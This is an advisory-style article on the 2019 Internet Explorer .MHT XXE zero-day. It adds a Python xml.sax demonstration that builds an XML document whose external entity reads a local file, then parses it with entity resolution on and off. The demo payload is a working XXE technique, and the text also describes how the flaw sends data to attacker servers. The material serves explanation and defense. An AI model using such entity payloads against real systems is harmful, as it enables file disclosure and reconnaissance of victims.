XXE Injection Description
The XXE injection vulnerability affecting Internet Explorer was disclosed by a vulnerability researcher on April 19th, 2019. It falls under CWE-611 (Improper Restriction of XML External Entity Reference), the general weakness class for XXE rather than an identifier for this specific bug, and affects Microsoft's deprecated Internet Explorer. Unfortunately, IE is still used by many government agencies and banking institutions across the globe, and user caution is advised. The researcher describes the flaw as a "zero-day extensible markup language (XML) external entity (XXE) injection vulnerability." It is triggered when a user opens a weaponized .MHT file (MIME HTML web archive) and its content is loaded in Internet Explorer: XML markup embedded in the archive declares an external entity that points at a local file, and when the parser resolves that entity the file's contents can be sent to a server the attacker controls. Successful exploitation additionally requires some interaction with the opened page, such as opening it in a new tab or printing it; either action is enough.
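The following is an added example, not the researcher's proof of concept and not code from the original article. It shows the mechanism described above in a parser that can be run offline, Python's xml.sax (the IE flaw involves Internet Explorer's own XML handling, but the entity-resolution behaviour XXE abuses is the same): an external general entity whose SYSTEM identifier names a local file is referenced from element content, and a parser that resolves external entities splices the file into the document. The secret file, its path and the element names are constructed for the demonstration. parse_leak() runs once with external entity resolution enabled, which is the vulnerable configuration, and once with it disabled, which has been xml.sax's default since Python 3.7.1.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class LeakCollector(ContentHandler):
    """Collects the character data that ends up inside the <leak> element."""

    def __init__(self):
        super().__init__()
        self.inside = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "leak":
            self.inside = True

    def endElement(self, name):
        if name == "leak":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts).strip()


def build_xxe_document(target_path):
    """Construct the attacker-controlled XML (hypothetical sample document):
    an external general entity whose SYSTEM identifier points at a local
    file, referenced from element content so the file body becomes text."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE doc [\n"
        f'  <!ENTITY xxe SYSTEM "{target_path}">\n'
        "]>\n"
        "<doc><leak>&xxe;</leak></doc>\n"
    ).encode("utf-8")


def parse_leak(xml_bytes, resolve_external_entities):
    """Parse with xml.sax and return whatever text lands inside <leak>.

    resolve_external_entities=True reproduces the vulnerable configuration:
    the parser opens the SYSTEM identifier and splices the file into the
    document. False is the stdlib default (Python >= 3.7.1), which leaves
    the entity empty instead of reading the file.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = LeakCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def demo():
    """Run the same malicious document through both configurations.

    The secret file is constructed here purely for the demonstration; it
    stands in for a config file, private key or similar on the victim host.
    """
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w", encoding="utf-8") as f:
            f.write("db_password=hunter2\n")
        doc = build_xxe_document(secret)
        return {
            "resolved": parse_leak(doc, resolve_external_entities=True),
            "blocked": parse_leak(doc, resolve_external_entities=False),
        }


if __name__ == "__main__":
    for mode, text in demo().items():
        print(f"{mode:9s} -> {text!r}")
```

Running the script prints the contents of the secret file in the "resolved" case and an empty string in the "blocked" case. The check to carry out on your own software is the same one the example makes: find every XML parser that accepts untrusted input and confirm that DTD processing or external entity resolution is switched off, rather than relying on a default you have not verified.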
In either case, the attackers receive data about the user's PC that includes the IP address, active username, Windows version, a log of installed software and versions, attached peripheral devices (keyboard, mouse, webcam, scanners, printer, etc.) and web browser bookmarks. The data pulled from systems can be used by attackers as reconnaissance and can help them design second-stage attacks: knowing your software and hardware configuration, as well as your interests based on your web browser activity, helps attackers craft a targeted attack. Microsoft responded to the report by saying:
"Internet Explorer alone does not permit this type of malicious behavior. An attacker must trick or convince a user into downloading a malicious document through a socially engineered scheme, for example a spam email attachment or phishing campaign that triggers a download. The file must then be opened with the browser. To guard against this scheme, practice safe computing habits online, such as avoiding downloading and opening untrusted files from the Internet."
We recommend that users switch to a browser other than Internet Explorer and remain vigilant when opening attached files. Note that changing your default browser alone does not help here: the attack starts when an .MHT file is opened, and that file type is loaded by Internet Explorer, so .MHT attachments should be treated as untrusted and not opened. You may also want to take advantage of Yahoo Mail, Gmail, Outlook and other email service providers that offer strong spam filtering, keeping in mind that a filter reduces the number of such attachments that reach you but is no substitute for not opening them.